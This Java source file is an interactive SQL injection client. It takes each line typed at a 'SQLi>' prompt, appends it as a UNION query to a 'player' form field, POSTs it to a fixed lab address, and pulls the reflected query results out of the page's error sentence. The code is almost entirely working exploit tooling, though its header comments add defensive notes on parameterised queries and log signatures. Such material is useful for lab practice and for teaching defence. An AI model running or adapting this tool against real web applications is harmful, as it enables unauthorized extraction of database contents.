//usr/bin/env java $0 $@; exit $?
package scripts;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.UncheckedIOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Scanner;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
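/**
 * Interactive console client for one fixed lab endpoint.
 *
 * <p>Each line typed at the {@code SQLi> } prompt is substituted into the {@code player}
 * form field and POSTed to {@link #POST_URL}. The text the page echoes back between
 * {@code "Sorry, "} and {@code " you are not eligible due to already qualifying."} is printed.
 *
 * <p>Reviewer notes, from the defending side:
 * <ul>
 *   <li>The request body closes a quote and appends {@code union ...} to the {@code player}
 *       value. That only yields output if the server concatenates the field into its SQL
 *       text, so the remedy belongs in the server: bind {@code player} as a query parameter
 *       instead of building the statement from strings.</li>
 *   <li>The page reflects query results inside its error sentence. Returning a fixed message
 *       would remove that channel even where a query is still injectable.</li>
 *   <li>A request whose {@code player} value contains a quote followed by {@code union} and a
 *       trailing {@code -- -} comment is a simple, high-signal pattern for web or WAF logs.</li>
 *   <li>The target address is in private (RFC 1918) space and is reached over plain HTTP.</li>
 * </ul>
 */
public class UnionSQLi {
    private static final String POST_URL = "http://10.10.11.128/index.php";
    // %s receives the operator's line verbatim; it is not form-encoded before sending.
    private static final String POST_DATA = "player=' union %s -- -";
    // [\s\S]*? lets the reflected value span several lines; the lazy quantifier stops at the
    // first occurrence of the trailing sentence. The final '.' is an unescaped regex dot.
    private static final Pattern PATTERN = Pattern.compile("Sorry, ([\\s\\S]*?) you are not eligible due to already qualifying.");

    /**
     * Runs the prompt loop until the operator types {@code exit} or standard input ends.
     *
     * <p>Prints the reflected value for each request, or {@code ERROR} when the response is
     * not the expected "Sorry, ..." page. An {@link IOException} raised while connecting or
     * sending ends the loop after printing {@code ERROR}.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        try (Scanner in = new Scanner(System.in)) {
            while (true) {
                System.out.print("SQLi> ");
                // End of input (closed pipe, Ctrl-D) would make nextLine() throw; stop cleanly.
                if (!in.hasNextLine()) {
                    break;
                }
                String sqli = in.nextLine();
                if (sqli.equals("exit")) {
                    break;
                }
                if (sqli.isEmpty()) {
                    continue;
                }

                String response = sendPOST(sqli);
                // A page can start with "Sorry" without matching the full sentence, in which
                // case filterResult yields null and the request is reported as a failure.
                String reflected = response.startsWith("Sorry") ? filterResult(response) : null;
                System.out.println(reflected != null ? reflected : "ERROR");
            }
        } catch (IOException e) {
            System.out.println("ERROR");
        }
    }

    /**
     * POSTs the formatted {@code player} field to {@link #POST_URL} and returns the body.
     *
     * @param sqli text substituted for {@code %s} in {@link #POST_DATA}
     * @return the response body with every line terminated by {@code "\n"}, or an empty
     *     string when the status is not 200 or the body cannot be read
     * @throws IOException if the connection cannot be opened or the request body cannot be sent
     */
    private static String sendPOST(String sqli) throws IOException {
        HttpURLConnection connection = (HttpURLConnection) new URL(POST_URL).openConnection();
        try {
            connection.setRequestMethod("POST");
            connection.setDoOutput(true);

            // try-with-resources closes the stream even when write() fails; the explicit
            // charset keeps the bytes on the wire independent of the platform default.
            try (OutputStream body = connection.getOutputStream()) {
                body.write(String.format(POST_DATA, sqli).getBytes(StandardCharsets.UTF_8));
            }

            if (connection.getResponseCode() != HttpURLConnection.HTTP_OK) {
                return "";
            }

            // NOTE(review): decodes the page as UTF-8; confirm against the response Content-Type.
            try (BufferedReader reader = new BufferedReader(
                    new InputStreamReader(connection.getInputStream(), StandardCharsets.UTF_8))) {
                return reader.lines().map(line -> line + "\n").collect(Collectors.joining());
            } catch (IOException | UncheckedIOException e) {
                // BufferedReader.lines() reports read failures as UncheckedIOException.
                // The caller prints ERROR for an empty body, so nothing is printed here.
                return "";
            }
        } finally {
            connection.disconnect();
        }
    }

    /**
     * Extracts the text reflected inside the page's "Sorry, ..." sentence.
     *
     * @param response response body to search
     * @return the first captured value, or {@code null} when the sentence is not present
     */
    private static String filterResult(String response) {
        Matcher matcher = PATTERN.matcher(response);
        // group(1) is only valid after a successful find().
        return matcher.find() ? matcher.group(1) : null;
    }
}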